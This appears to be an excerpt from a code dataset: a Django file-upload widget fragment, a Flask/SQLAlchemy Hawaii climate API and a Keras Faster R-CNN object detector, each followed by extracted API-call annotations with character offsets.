        extra_attrs.update({
            'name': name,
            'class': 'djng-{}-uploader'.format(self.filetype),
            'djng-fileupload-url': self.fileupload_url,
            'ngf-drop': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
            'ngf-select': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs),
        })
        # Let subclasses add state-dependent attributes (e.g. a preview background).
        self.update_attributes(extra_attrs, value)
        final_attrs = self.build_attrs(self.attrs, extra_attrs=extra_attrs)
        elements = [format_html('<textarea {}>{}</textarea>', flatatt(final_attrs), self.area_label)]
        # add a spinning wheel shown while an upload is in progress
        spinner_attrs = {
            'class': 'glyphicon glyphicon-refresh glyphicon-spin',
            'ng-cloak': True,
        }
        elements.append(format_html('<span {}></span>', flatatt(spinner_attrs)))
        # add a delete icon
        icon_attrs = {
            'src': staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)),
            'class': 'djng-btn-trash',
            'title': _("Delete File"),
            # NOTE(review): trailing space in this attribute name looks accidental,
            # but it is emitted verbatim into the markup — confirm before changing.
            'djng-fileupload-button ': True,
            'ng-click': 'deleteImage("{id}", "{ng-model}")'.format(**attrs),
            'ng-cloak': True,
        }
        elements.append(format_html('<img {} />', flatatt(icon_attrs)))
        # add a download icon, only when a file is already attached
        if value:
            download_attrs = {
                'href': value.url,
                'class': 'djng-btn-download',
                'title': _("Download File"),
                'download': True,
                'ng-cloak': True,
            }
            download_icon = staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))
            elements.append(format_html('<a {}><img src="{}" /></a>', flatatt(download_attrs), download_icon))
        return format_html('<div class="drop-box">{}</div>', mark_safe(''.join(elements)))
    def update_attributes(self, attrs, value):
        """If a file is attached, show a type-specific icon as background
        and embed the signed file name in the 'current-file' attribute."""
        if value:
            try:
                # NOTE(review): '_' here shadows the module-level gettext alias
                # within this method; harmless since '_' is not used below.
                content_type, _ = mimetypes.guess_type(value.file.name)
                extension = mimetypes.guess_extension(content_type)[1:]
            except (IOError, IndexError, TypeError):
                # Unknown/unreadable type: fall back to the generic icon.
                extension = '_blank'
            background_url = staticfiles_storage.url('djng/icons/{}.png'.format(extension))
            attrs.update({
                'style': 'background-image: url({});'.format(background_url),
                'current-file': self.signer.sign(value.name)
            })
class DropImageWidget(DropFileWidget):
    """Drag-and-drop upload widget specialized for images: shows a
    thumbnail of the current image as the drop-area background."""

    def __init__(self, area_label, fileupload_url, attrs=None):
        super(DropImageWidget, self).__init__(area_label, fileupload_url, attrs=attrs)
        self.filetype = 'image'

    def update_attributes(self, attrs, value):
        """Add a thumbnail background and the signed file name, if any."""
        if not value:
            return
        thumb_url = self.get_background_url(value)
        if thumb_url:
            attrs['style'] = 'background-image: url({});'.format(thumb_url)
            attrs['current-file'] = self.signer.sign(value.name)

    def get_background_url(self, value):
        """Return the thumbnail URL for *value*, or None for broken images."""
        from easy_thumbnails.exceptions import InvalidImageFormatError
        from easy_thumbnails.files import get_thumbnailer
        try:
            thumb = get_thumbnailer(value).get_thumbnail(app_settings.THUMBNAIL_OPTIONS)
        except InvalidImageFormatError:
            return None
        return thumb.url
| [
"django.utils.translation.ugettext_lazy",
"easy_thumbnails.files.get_thumbnailer",
"mimetypes.guess_type",
"django.forms.utils.flatatt",
"mimetypes.guess_extension",
"django.core.signing.Signer"
] | [((417, 433), 'django.core.signing.Signer', 'signing.Signer', ([], {}), '()\n', (431, 433), False, 'from django.core import signing\n'), ((1915, 1931), 'django.utils.translation.ugettext_lazy', '_', (['"""Delete File"""'], {}), "('Delete File')\n", (1916, 1931), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((4141, 4163), 'easy_thumbnails.files.get_thumbnailer', 'get_thumbnailer', (['value'], {}), '(value)\n', (4156, 4163), False, 'from easy_thumbnails.files import get_thumbnailer\n'), ((1423, 1443), 'django.forms.utils.flatatt', 'flatatt', (['final_attrs'], {}), '(final_attrs)\n', (1430, 1443), False, 'from django.forms.utils import flatatt\n'), ((1685, 1707), 'django.forms.utils.flatatt', 'flatatt', (['spinner_attrs'], {}), '(spinner_attrs)\n', (1692, 1707), False, 'from django.forms.utils import flatatt\n'), ((2145, 2164), 'django.forms.utils.flatatt', 'flatatt', (['icon_attrs'], {}), '(icon_attrs)\n', (2152, 2164), False, 'from django.forms.utils import flatatt\n'), ((2353, 2371), 'django.utils.translation.ugettext_lazy', '_', (['"""Download File"""'], {}), "('Download File')\n", (2354, 2371), True, 'from django.utils.translation import ugettext_lazy as _\n'), ((2879, 2916), 'mimetypes.guess_type', 'mimetypes.guess_type', (['value.file.name'], {}), '(value.file.name)\n', (2899, 2916), False, 'import mimetypes\n'), ((2629, 2652), 'django.forms.utils.flatatt', 'flatatt', (['download_attrs'], {}), '(download_attrs)\n', (2636, 2652), False, 'from django.forms.utils import flatatt\n'), ((2945, 2984), 'mimetypes.guess_extension', 'mimetypes.guess_extension', (['content_type'], {}), '(content_type)\n', (2970, 2984), False, 'import mimetypes\n')] |
from flask import jsonify, render_template
import sqlalchemy
from sqlalchemy.ext.automap import automap_base
from sqlalchemy.orm import Session
from sqlalchemy import create_engine, func
import datetime as dt
from climateapp import app
# Reflect the existing SQLite schema into mapped classes (automap: no
# hand-written models).
engine = create_engine('sqlite:///../Resources/hawaii.sqlite')
Base = automap_base()
Base.prepare(engine,reflect=True)

# Handles to the two reflected tables used by the routes below.
Measurements = Base.classes.measurement
Stations = Base.classes.station
@app.route('/')
def home():
    """Serve the landing page."""
    index_page = render_template('index.html')
    return index_page
@app.route('/api/v1.0/precipitation')
def perciptation():
    """Return daily total precipitation for the trailing 365 days as JSON.

    Response: list of {"date": "YYYY-MM-DD", "prcp": <daily sum>}.
    """
    session = Session(engine)
    try:
        # Most recent measurement date present in the data set.
        lastDate = session.query(Measurements.date).order_by(Measurements.date.desc()).first()
        date = dt.datetime.strptime(lastDate[0], "%Y-%m-%d")
        sel = [Measurements.date,
               func.sum(Measurements.prcp)]
        # BUG FIX: the strftime format previously contained a stray ')'
        # ("%Y-%m-%d)"), so the formatted dates never matched cleanly.
        data = session.query(*sel).\
            filter(func.strftime("%Y-%m-%d", Measurements.date) >= str(date - dt.timedelta(days=365))).\
            group_by(Measurements.date).all()
    finally:
        # Close the session even if the query raises.
        session.close()
    returnList = []
    for row in data:
        dateDict = {}
        dateDict["date"] = row.date
        dateDict["prcp"] = row[1]
        returnList.append(dateDict)
    return jsonify(returnList)
@app.route('/api/v1.0/stations')
def stations():
    """Return the id and name of every weather station as JSON."""
    session = Session(engine)
    rows = session.query(Stations.station, Stations.name).all()
    session.close()
    payload = [{"station": station_id, "name": station_name}
               for station_id, station_name in rows]
    return jsonify(payload)
@app.route('/api/v1.0/tobs')
def tobs():
    """Return min/max/avg temperature for the most active station as JSON."""
    session = Session(engine)
    # Rank stations by number of measurements and keep the busiest one.
    sel = [Stations.station,
           func.count(Measurements.station)]
    rankedStations = session.query(*sel).filter(Measurements.station == Stations.station).\
        group_by(Measurements.station).order_by(func.count(Measurements.station).desc()).first()
    # Extract the station id from the top-ranked row.
    for row in rankedStations:
        bestId = rankedStations.station
    # Temperature aggregates restricted to that station.
    sel = [Stations.station,
           func.min(Measurements.tobs),
           func.max(Measurements.tobs),
           func.avg(Measurements.tobs)
           ]
    data = session.query(*sel).\
        filter(Measurements.station == Stations.station).\
        filter(Stations.station == bestId).all()
    session.close()
    returnList = []
    for row in data:
        tobsDict = {}
        tobsDict["station"] = row.station
        tobsDict["min"] = row[1]
        tobsDict["max"] = row[2]
        tobsDict["avg"] = row[3]
        returnList.append(tobsDict)
    return jsonify(returnList)
@app.route('/api/v1.0/<start>')
def start(start):
    """Return [min, avg, max] temperature observed on/after *start* (YYYY-MM-DD)."""
    session = Session(engine)
    aggregates = (func.min(Measurements.tobs),
                  func.avg(Measurements.tobs),
                  func.max(Measurements.tobs))
    data = session.query(*aggregates).filter(Measurements.date >= start).all()
    return jsonify(data)
@app.route('/api/v1.0/<start>/<end>')
def dateRange(start,end):
    """Return [min, avg, max] temperature between *start* and *end*
    (inclusive, both YYYY-MM-DD) as JSON."""
    session = Session(engine)
    # NOTE(review): the session is never closed in this route — confirm
    # whether that is intentional or an oversight.
    data = session.query(func.min(Measurements.tobs), func.avg(Measurements.tobs), func.max(Measurements.tobs)).\
        filter(Measurements.date >= start).\
        filter(Measurements.date <= end).all()
    return jsonify(data) | [
"flask.render_template",
"climateapp.app.route",
"sqlalchemy.func.count",
"sqlalchemy.func.sum",
"sqlalchemy.func.min",
"datetime.datetime.strptime",
"sqlalchemy.ext.automap.automap_base",
"sqlalchemy.create_engine",
"sqlalchemy.orm.Session",
"sqlalchemy.func.max",
"sqlalchemy.func.strftime",
... | [((246, 299), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///../Resources/hawaii.sqlite"""'], {}), "('sqlite:///../Resources/hawaii.sqlite')\n", (259, 299), False, 'from sqlalchemy import create_engine, func\n'), ((308, 322), 'sqlalchemy.ext.automap.automap_base', 'automap_base', ([], {}), '()\n', (320, 322), False, 'from sqlalchemy.ext.automap import automap_base\n'), ((432, 446), 'climateapp.app.route', 'app.route', (['"""/"""'], {}), "('/')\n", (441, 446), False, 'from climateapp import app\n'), ((499, 535), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/precipitation"""'], {}), "('/api/v1.0/precipitation')\n", (508, 535), False, 'from climateapp import app\n'), ((1159, 1190), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/stations"""'], {}), "('/api/v1.0/stations')\n", (1168, 1190), False, 'from climateapp import app\n'), ((1509, 1536), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/tobs"""'], {}), "('/api/v1.0/tobs')\n", (1518, 1536), False, 'from climateapp import app\n'), ((2402, 2432), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/<start>"""'], {}), "('/api/v1.0/<start>')\n", (2411, 2432), False, 'from climateapp import app\n'), ((2657, 2693), 'climateapp.app.route', 'app.route', (['"""/api/v1.0/<start>/<end>"""'], {}), "('/api/v1.0/<start>/<end>')\n", (2666, 2693), False, 'from climateapp import app\n'), ((467, 496), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (482, 496), False, 'from flask import jsonify, render_template\n'), ((567, 582), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (574, 582), False, 'from sqlalchemy.orm import Session\n'), ((1137, 1156), 'flask.jsonify', 'jsonify', (['returnList'], {}), '(returnList)\n', (1144, 1156), False, 'from flask import jsonify, render_template\n'), ((1219, 1234), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (1226, 1234), False, 'from sqlalchemy.orm import Session\n'), 
((1487, 1506), 'flask.jsonify', 'jsonify', (['returnList'], {}), '(returnList)\n', (1494, 1506), False, 'from flask import jsonify, render_template\n'), ((1561, 1576), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (1568, 1576), False, 'from sqlalchemy.orm import Session\n'), ((2380, 2399), 'flask.jsonify', 'jsonify', (['returnList'], {}), '(returnList)\n', (2387, 2399), False, 'from flask import jsonify, render_template\n'), ((2462, 2477), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (2469, 2477), False, 'from sqlalchemy.orm import Session\n'), ((2641, 2654), 'flask.jsonify', 'jsonify', (['data'], {}), '(data)\n', (2648, 2654), False, 'from flask import jsonify, render_template\n'), ((2731, 2746), 'sqlalchemy.orm.Session', 'Session', (['engine'], {}), '(engine)\n', (2738, 2746), False, 'from sqlalchemy.orm import Session\n'), ((2948, 2961), 'flask.jsonify', 'jsonify', (['data'], {}), '(data)\n', (2955, 2961), False, 'from flask import jsonify, render_template\n'), ((705, 742), 'datetime.datetime.strptime', 'dt.datetime.strptime', (['row', '"""%Y-%m-%d"""'], {}), "(row, '%Y-%m-%d')\n", (725, 742), True, 'import datetime as dt\n'), ((775, 802), 'sqlalchemy.func.sum', 'func.sum', (['Measurements.prcp'], {}), '(Measurements.prcp)\n', (783, 802), False, 'from sqlalchemy import create_engine, func\n'), ((1608, 1640), 'sqlalchemy.func.count', 'func.count', (['Measurements.station'], {}), '(Measurements.station)\n', (1618, 1640), False, 'from sqlalchemy import create_engine, func\n'), ((1923, 1950), 'sqlalchemy.func.min', 'func.min', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (1931, 1950), False, 'from sqlalchemy import create_engine, func\n'), ((1957, 1984), 'sqlalchemy.func.max', 'func.max', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (1965, 1984), False, 'from sqlalchemy import create_engine, func\n'), ((1991, 2018), 'sqlalchemy.func.avg', 'func.avg', (['Measurements.tobs'], {}), 
'(Measurements.tobs)\n', (1999, 2018), False, 'from sqlalchemy import create_engine, func\n'), ((1778, 1810), 'sqlalchemy.func.count', 'func.count', (['Measurements.station'], {}), '(Measurements.station)\n', (1788, 1810), False, 'from sqlalchemy import create_engine, func\n'), ((2500, 2527), 'sqlalchemy.func.min', 'func.min', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2508, 2527), False, 'from sqlalchemy import create_engine, func\n'), ((2529, 2556), 'sqlalchemy.func.avg', 'func.avg', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2537, 2556), False, 'from sqlalchemy import create_engine, func\n'), ((2558, 2585), 'sqlalchemy.func.max', 'func.max', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2566, 2585), False, 'from sqlalchemy import create_engine, func\n'), ((840, 885), 'sqlalchemy.func.strftime', 'func.strftime', (['"""%Y-%m-%d)"""', 'Measurements.date'], {}), "('%Y-%m-%d)', Measurements.date)\n", (853, 885), False, 'from sqlalchemy import create_engine, func\n'), ((2769, 2796), 'sqlalchemy.func.min', 'func.min', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2777, 2796), False, 'from sqlalchemy import create_engine, func\n'), ((2798, 2825), 'sqlalchemy.func.avg', 'func.avg', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2806, 2825), False, 'from sqlalchemy import create_engine, func\n'), ((2827, 2854), 'sqlalchemy.func.max', 'func.max', (['Measurements.tobs'], {}), '(Measurements.tobs)\n', (2835, 2854), False, 'from sqlalchemy import create_engine, func\n'), ((901, 923), 'datetime.timedelta', 'dt.timedelta', ([], {'days': '(365)'}), '(days=365)\n', (913, 923), True, 'import datetime as dt\n')] |
"""fasterRCNN对象创建"""
import numpy as np
import colorsys
import os
from keras import backend as K
from keras.applications.imagenet_utils import preprocess_input
from PIL import Image, ImageFont, ImageDraw
import copy
import math
from net import fasterrcnn as frcnn
from net import netconfig as netconfig
from net import RPN as RPN
from net import tools as tools
class FasterRCNN(object):
    """Faster R-CNN inference wrapper.

    Loads trained RPN + classifier weights and runs two-stage detection
    on PIL images, drawing boxes/labels on a copy of the input image.
    """
    # Default configuration; get_defaults() exposes these by name.
    _defaults = {
        "model_path": './model_data/logs/epoch015-loss1.729-rpn1.025-roi0.704.h5',
        "classes_path": './model_data/index.txt',
        "confidence": 0.7,
    }
    @classmethod
    def get_defaults(cls, n):
        """Return the default value for attribute *n*, or an error string."""
        if n in cls._defaults:
            return cls._defaults[n]
        else:
            return "Unrecognized attribute name '" + n + "'"
    def __init__(self, **kwargs):
        """Initialize the Faster R-CNN detector and load the models."""
        self.__dict__.update(self._defaults)
        self.class_names = self._get_class()
        self.sess = K.get_session()
        self.config = netconfig.Config()
        self.generate()
        self.bbox_util = tools.BBoxUtility()
        # NOTE(review): these re-assignments override the class defaults, and
        # **kwargs is accepted but never applied — confirm intent.
        self.confidence = 0.7
        self.classes_path='./model_data/index.txt'
        self.model_path='./model_data/logs/epoch015-loss1.729-rpn1.025-roi0.704.h5'
    def _get_class(self):
        """Read and return the list of class names from classes_path."""
        classes_path = os.path.expanduser(self.classes_path)
        with open(classes_path) as f:
            class_names = f.readlines()
        class_names = [c.strip() for c in class_names]
        return class_names
    def generate(self):
        """Build the prediction models, load weights and prepare box colors."""
        model_path = os.path.expanduser(self.model_path)
        assert model_path.endswith('.h5'), 'Keras model or weights must be a .h5 file.'
        # Total number of classes (+1 for the background class).
        self.num_classes = len(self.class_names) + 1
        # Build the model structure, then load the weights into it
        # (weights are loaded by layer name, mismatches skipped for the head).
        self.model_rpn, self.model_classifier = frcnn.get_predict_model(self.config, self.num_classes)
        self.model_rpn.load_weights(self.model_path, by_name=True)
        self.model_classifier.load_weights(self.model_path, by_name=True, skip_mismatch=True)
        print('{} model, anchors, and classes loaded.'.format(model_path))
        # Assign a distinct, evenly spaced HSV-derived color per class for
        # drawing bounding boxes.
        hsv_tuples = [(x / len(self.class_names), 1., 1.)
                      for x in range(len(self.class_names))]
        self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))
        self.colors = list(
            map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),
                self.colors))
    def get_img_output_length(self, width, height):
        """Return the (width, height) of the shared feature map for an input
        of the given size, after the backbone's four stride-2 stages."""
        def get_output_length(input_length):
            # input_length += 6
            filter_sizes = [7, 3, 1, 1]
            padding = [3, 1, 0, 0]
            stride = 2
            for i in range(4):
                # input_length = (input_length - filter_size + stride) // stride
                input_length = (input_length + 2 * padding[i] - filter_sizes[i]) // stride + 1
            return input_length
        return get_output_length(width), get_output_length(height)
    def detect_image(self, image):
        """Run detection on a PIL image; return a copy with boxes drawn.

        Returns the untouched original image when nothing is detected.
        """
        image_shape = np.array(np.shape(image)[0:2])
        old_width = image_shape[1]
        old_height = image_shape[0]
        # Keep a copy of the original image to draw the final result on.
        old_image = copy.deepcopy(image)
        # Resize so the image's shorter side becomes the configured size
        # (600 px, per get_new_img_size).
        width, height = tools.get_new_img_size(old_width, old_height)
        image = image.resize([width, height])
        # Convert the image to a float array.
        photo = np.array(image, dtype=np.float64)
        # Preprocess: add a batch dimension and normalise for the backbone.
        photo = preprocess_input(np.expand_dims(photo, 0))
        # Run the RPN: yields objectness scores and box regressions.
        preds = self.model_rpn.predict(photo)
        # Decode the predictions:
        # first generate every anchor box for this feature-map size.
        anchors = RPN.create_anchor(self.get_img_output_length(width, height), width, height)
        # Decode into region proposals (~300 of them); coordinates are
        # normalised to the [0, 1] range.
        rpn_results = self.bbox_util.detection_out(preds, anchors, 1, confidence_threshold=0)
        # Map the normalised proposals onto shared feature-map coordinates
        # (e.g. 0-38 for a 38x38 map). R is N rows of [x1, y1, x2, y2].
        R = rpn_results[0][:, 2:]
        R[:, 0] = np.array(np.round(R[:, 0] * width / self.config.rpn_stride), dtype=np.int32)
        R[:, 1] = np.array(np.round(R[:, 1] * height / self.config.rpn_stride), dtype=np.int32)
        R[:, 2] = np.array(np.round(R[:, 2] * width / self.config.rpn_stride), dtype=np.int32)
        R[:, 3] = np.array(np.round(R[:, 3] * height / self.config.rpn_stride), dtype=np.int32)
        print(R)
        # Convert R from corner form to [x, y, w, h].
        R[:, 2] -= R[:, 0]
        R[:, 3] -= R[:, 1]
        base_layer = preds[2]
        # Drop degenerate proposals (width or height < 1 on the feature map).
        delete_line = []
        for i, r in enumerate(R):
            if r[2] < 1 or r[3] < 1:
                delete_line.append(i)
        R = np.delete(R, delete_line, axis=0)
        bboxes = []
        probs = []
        labels = []
        # Process the proposals in batches of num_rois (32).
        for jk in range(R.shape[0] // self.config.num_rois + 1):
            # Take the next batch of proposals.
            ROIs = np.expand_dims(R[self.config.num_rois * jk:self.config.num_rois * (jk + 1), :], axis=0)
            # Stop when there are no proposals left.
            if ROIs.shape[1] == 0:
                break
            # Pad the last partial batch up to num_rois by repeating
            # the first ROI.
            if jk == R.shape[0] // self.config.num_rois:
                # pad R
                curr_shape = ROIs.shape
                target_shape = (curr_shape[0], self.config.num_rois, curr_shape[2])
                ROIs_padded = np.zeros(target_shape).astype(ROIs.dtype)
                ROIs_padded[:, :curr_shape[1], :] = ROIs
                ROIs_padded[0, curr_shape[1]:, :] = ROIs[0, 0, :]
                ROIs = ROIs_padded
            # Run the classifier head on the shared features + ROIs:
            # P_cls  is (batch, num_rois, num_classes)      - class scores
            # P_regr is (batch, num_rois, 4*(num_classes-1)) - box refinements
            [P_cls, P_regr] = self.model_classifier.predict([base_layer, ROIs])
            # Keep only ROIs that confidently contain a foreground object;
            # the last class index is background and is skipped.
            for ii in range(P_cls.shape[1]):
                # P_cls[0, ii, :-1] are the foreground class probabilities.
                if np.max(P_cls[0, ii, :-1]) < self.confidence or np.argmax(P_cls[0, ii, :]) == (P_cls.shape[2] - 1):
                    continue
                # Predicted class index.
                label = np.argmax(P_cls[0, ii, :-1])
                # ROI coordinates on the feature map.
                (x, y, w, h) = ROIs[0, ii, :]
                # Same as label; used to slice the regression output.
                cls_num = np.argmax(P_cls[0, ii, :-1])
                # Regression deltas for this class; undo the training-time
                # normalisation.
                (tx, ty, tw, th) = P_regr[0, ii, 4 * cls_num:4 * (cls_num + 1)]
                tx /= self.config.classifier_regr_std[0]
                ty /= self.config.classifier_regr_std[1]
                tw /= self.config.classifier_regr_std[2]
                th /= self.config.classifier_regr_std[3]
                # Apply the deltas to get the refined box (still in
                # feature-map coordinates).
                cx = x + w / 2.
                cy = y + h / 2.
                cx1 = tx * w + cx
                cy1 = ty * h + cy
                w1 = math.exp(tw) * w
                h1 = math.exp(th) * h
                x1 = cx1 - w1 / 2.
                y1 = cy1 - h1 / 2.
                x2 = cx1 + w1 / 2
                y2 = cy1 + h1 / 2
                x1 = int(round(x1))
                y1 = int(round(y1))
                x2 = int(round(x2))
                y2 = int(round(y2))
                # Collected boxes were only filtered by confidence, so
                # overlapping detections remain; NMS is applied later.
                bboxes.append([x1, y1, x2, y2])
                probs.append(np.max(P_cls[0, ii, :-1]))
                labels.append(label)
        # Nothing detected: return the original image untouched.
        if len(bboxes) == 0:
            return old_image
        # Map boxes from feature-map coordinates back to the resized image
        # (normalised 0-1), then run per-class NMS to remove overlaps.
        labels = np.array(labels)
        probs = np.array(probs)
        boxes = np.array(bboxes, dtype=np.float32)
        boxes[:, 0] = boxes[:, 0] * self.config.rpn_stride / width
        boxes[:, 1] = boxes[:, 1] * self.config.rpn_stride / height
        boxes[:, 2] = boxes[:, 2] * self.config.rpn_stride / width
        boxes[:, 3] = boxes[:, 3] * self.config.rpn_stride / height
        results = np.array(
            self.bbox_util.nms_for_out(np.array(labels), np.array(probs), np.array(boxes), self.num_classes - 1, 0.4))
        top_label_indices = results[:, 0]
        top_conf = results[:, 1]
        boxes = results[:, 2:]
        #top_label_indices=labels
        #top_conf=probs
        # Scale the surviving boxes back onto the original image size.
        boxes[:, 0] = boxes[:, 0] * old_width
        boxes[:, 1] = boxes[:, 1] * old_height
        boxes[:, 2] = boxes[:, 2] * old_width
        boxes[:, 3] = boxes[:, 3] * old_height
        # simhei.ttf supplies the font for the box labels.
        font = ImageFont.truetype(font='model_data/simhei.ttf',size=np.floor(3e-2 * np.shape(image)[1] + 0.5).astype('int32'))
        thickness = (np.shape(old_image)[0] + np.shape(old_image)[1]) // old_width * 2
        image = old_image
        for i, c in enumerate(top_label_indices):
            predicted_class = self.class_names[int(c)]
            score = top_conf[i]
            left, top, right, bottom = boxes[i]
            # Pad the box by 5 px on every side, clamped to the image.
            top = top - 5
            left = left - 5
            bottom = bottom + 5
            right = right + 5
            top = max(0, np.floor(top + 0.5).astype('int32'))
            left = max(0, np.floor(left + 0.5).astype('int32'))
            bottom = min(np.shape(image)[0], np.floor(bottom + 0.5).astype('int32'))
            right = min(np.shape(image)[1], np.floor(right + 0.5).astype('int32'))
            # Draw the box and its "<class> <score>" label.
            label = '{} {:.2f}'.format(predicted_class, score)
            draw = ImageDraw.Draw(image)
            label_size = draw.textsize(label, font)
            label = label.encode('utf-8')
            print(label)
            # Place the label above the box when there is room, else inside.
            if top - label_size[1] >= 0:
                text_origin = np.array([left, top - label_size[1]])
            else:
                text_origin = np.array([left, top + 1])
            # Draw nested rectangles to simulate line thickness.
            for i in range(thickness):
                draw.rectangle(
                    [left + i, top + i, right - i, bottom - i],
                    outline=self.colors[int(c)])
            draw.rectangle(
                [tuple(text_origin), tuple(text_origin + label_size)],
                fill=self.colors[int(c)])
            draw.text(text_origin, str(label, 'UTF-8'), fill=(0, 0, 0), font=font)
            del draw
        return image
    def close(self):
        """Release the underlying TensorFlow session."""
        self.sess.close() | [
"net.tools.get_new_img_size",
"colorsys.hsv_to_rgb",
"numpy.array",
"PIL.ImageDraw.Draw",
"copy.deepcopy",
"math.exp",
"numpy.delete",
"numpy.max",
"numpy.round",
"os.path.expanduser",
"net.tools.BBoxUtility",
"net.fasterrcnn.get_predict_model",
"numpy.floor",
"numpy.argmax",
"numpy.shap... | [((938, 953), 'keras.backend.get_session', 'K.get_session', ([], {}), '()\n', (951, 953), True, 'from keras import backend as K\n'), ((976, 994), 'net.netconfig.Config', 'netconfig.Config', ([], {}), '()\n', (992, 994), True, 'from net import netconfig as netconfig\n'), ((1044, 1063), 'net.tools.BBoxUtility', 'tools.BBoxUtility', ([], {}), '()\n', (1061, 1063), True, 'from net import tools as tools\n'), ((1301, 1338), 'os.path.expanduser', 'os.path.expanduser', (['self.classes_path'], {}), '(self.classes_path)\n', (1319, 1338), False, 'import os\n'), ((1567, 1602), 'os.path.expanduser', 'os.path.expanduser', (['self.model_path'], {}), '(self.model_path)\n', (1585, 1602), False, 'import os\n'), ((1871, 1925), 'net.fasterrcnn.get_predict_model', 'frcnn.get_predict_model', (['self.config', 'self.num_classes'], {}), '(self.config, self.num_classes)\n', (1894, 1925), True, 'from net import fasterrcnn as frcnn\n'), ((3270, 3290), 'copy.deepcopy', 'copy.deepcopy', (['image'], {}), '(image)\n', (3283, 3290), False, 'import copy\n'), ((3344, 3389), 'net.tools.get_new_img_size', 'tools.get_new_img_size', (['old_width', 'old_height'], {}), '(old_width, old_height)\n', (3366, 3389), True, 'from net import tools as tools\n'), ((3469, 3502), 'numpy.array', 'np.array', (['image'], {'dtype': 'np.float64'}), '(image, dtype=np.float64)\n', (3477, 3502), True, 'import numpy as np\n'), ((4711, 4744), 'numpy.delete', 'np.delete', (['R', 'delete_line'], {'axis': '(0)'}), '(R, delete_line, axis=0)\n', (4720, 4744), True, 'import numpy as np\n'), ((7633, 7649), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (7641, 7649), True, 'import numpy as np\n'), ((7666, 7681), 'numpy.array', 'np.array', (['probs'], {}), '(probs)\n', (7674, 7681), True, 'import numpy as np\n'), ((7698, 7732), 'numpy.array', 'np.array', (['bboxes'], {'dtype': 'np.float32'}), '(bboxes, dtype=np.float32)\n', (7706, 7732), True, 'import numpy as np\n'), ((3557, 3581), 'numpy.expand_dims', 
'np.expand_dims', (['photo', '(0)'], {}), '(photo, 0)\n', (3571, 3581), True, 'import numpy as np\n'), ((4073, 4123), 'numpy.round', 'np.round', (['(R[:, 0] * width / self.config.rpn_stride)'], {}), '(R[:, 0] * width / self.config.rpn_stride)\n', (4081, 4123), True, 'import numpy as np\n'), ((4168, 4219), 'numpy.round', 'np.round', (['(R[:, 1] * height / self.config.rpn_stride)'], {}), '(R[:, 1] * height / self.config.rpn_stride)\n', (4176, 4219), True, 'import numpy as np\n'), ((4264, 4314), 'numpy.round', 'np.round', (['(R[:, 2] * width / self.config.rpn_stride)'], {}), '(R[:, 2] * width / self.config.rpn_stride)\n', (4272, 4314), True, 'import numpy as np\n'), ((4359, 4410), 'numpy.round', 'np.round', (['(R[:, 3] * height / self.config.rpn_stride)'], {}), '(R[:, 3] * height / self.config.rpn_stride)\n', (4367, 4410), True, 'import numpy as np\n'), ((4938, 5029), 'numpy.expand_dims', 'np.expand_dims', (['R[self.config.num_rois * jk:self.config.num_rois * (jk + 1), :]'], {'axis': '(0)'}), '(R[self.config.num_rois * jk:self.config.num_rois * (jk + 1),\n :], axis=0)\n', (4952, 5029), True, 'import numpy as np\n'), ((9503, 9524), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', (['image'], {}), '(image)\n', (9517, 9524), False, 'from PIL import Image, ImageFont, ImageDraw\n'), ((3140, 3155), 'numpy.shape', 'np.shape', (['image'], {}), '(image)\n', (3148, 3155), True, 'import numpy as np\n'), ((6153, 6181), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :-1]'], {}), '(P_cls[0, ii, :-1])\n', (6162, 6181), True, 'import numpy as np\n'), ((6308, 6336), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :-1]'], {}), '(P_cls[0, ii, :-1])\n', (6317, 6336), True, 'import numpy as np\n'), ((8070, 8086), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (8078, 8086), True, 'import numpy as np\n'), ((8088, 8103), 'numpy.array', 'np.array', (['probs'], {}), '(probs)\n', (8096, 8103), True, 'import numpy as np\n'), ((8105, 8120), 'numpy.array', 'np.array', (['boxes'], {}), '(boxes)\n', 
